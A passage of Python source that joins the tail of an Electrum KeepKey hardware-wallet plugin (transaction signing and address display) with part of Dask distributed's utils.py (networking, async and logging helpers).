pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
utils.py
|
from __future__ import annotations
import asyncio
import contextvars
import functools
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from typing import TYPE_CHECKING
from typing import Any as AnyType
from typing import ClassVar, Container, Sequence, overload
import click
import tblib.pickling_support
if TYPE_CHECKING:
from typing_extensions import Protocol
try:
import resource
except ImportError:
resource = None # type: ignore
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
from dask.utils import parse_timedelta as _parse_timedelta
from dask.widgets import get_template
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except OSError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError(f"interface {ifname!r} doesn't have an IPv4 address")
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
class NoOpAwaitable:
"""An awaitable object that always returns None.
Useful to return from a method that can be called in both asynchronous and
synchronous contexts"""
def __await__(self):
async def f():
return None
return f().__await__()
class SyncMethodMixin:
"""
A mixin for adding an `asynchronous` attribute and `sync` method to a class.
Subclasses must define a `loop` attribute for an associated
`tornado.IOLoop`, and may also add a `_asynchronous` attribute indicating
whether the class should default to asynchronous behavior.
"""
@property
def asynchronous(self):
"""Are we running in the event loop?"""
return in_async_call(self.loop, default=getattr(self, "_asynchronous", False))
def sync(self, func, *args, asynchronous=None, callback_timeout=None, **kwargs):
"""Call `func` with `args` synchronously or asynchronously depending on
the calling context"""
callback_timeout = _parse_timedelta(callback_timeout)
if asynchronous is None:
asynchronous = self.asynchronous
if asynchronous:
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
return future
else:
return sync(
self.loop, func, *args, callback_timeout=callback_timeout, **kwargs
)
def in_async_call(loop, default=False):
"""Whether this call is currently within an async call"""
try:
return loop.asyncio_loop is asyncio.get_running_loop()
except RuntimeError:
# No *running* loop in thread. If the event loop isn't running, it
# _could_ be started later in this thread though. Return the default.
if not loop.asyncio_loop.is_running():
return default
return False
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = _parse_timedelta(callback_timeout, "s")
if loop.asyncio_loop.is_closed():
raise RuntimeError("IOLoop is closed")
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError(f"timed out after {callback_timeout} s.")
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops: ClassVar[
weakref.WeakKeyDictionary[IOLoop, tuple[int, LoopRunner | None]]
] = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
if loop is None:
if asynchronous:
self._loop = IOLoop.current()
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
# run loop forever if it's not running already
try:
if not loop.asyncio_loop.is_running():
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if start_exc[0] is not None and not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError(
f"not an exception: {start_exc[0]!r}",
)
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x) -> str:
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('') # Maps as localhost for binding e.g. 'tcp://:8811'
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
if not hostname:
hostname = "localhost"
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError(f"Unexpected key type {typ} (value: {k!r})")
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances: ClassVar[weakref.WeakSet[DequeHandler]] = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = {
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
}
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def _iscoroutinefunction(f):
# Python < 3.8 does not support determining if `partial` objects wrap async funcs
if sys.version_info < (3, 8):
while isinstance(f, functools.partial):
f = f.func
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@functools.lru_cache(None)
def _iscoroutinefunction_cached(f):
return _iscoroutinefunction(f)
def iscoroutinefunction(f):
# Attempt to use lru_cache version and fall back to non-cached version if needed
try:
return _iscoroutinefunction_cached(f)
except TypeError: # unhashable type
return _iscoroutinefunction(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > _parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
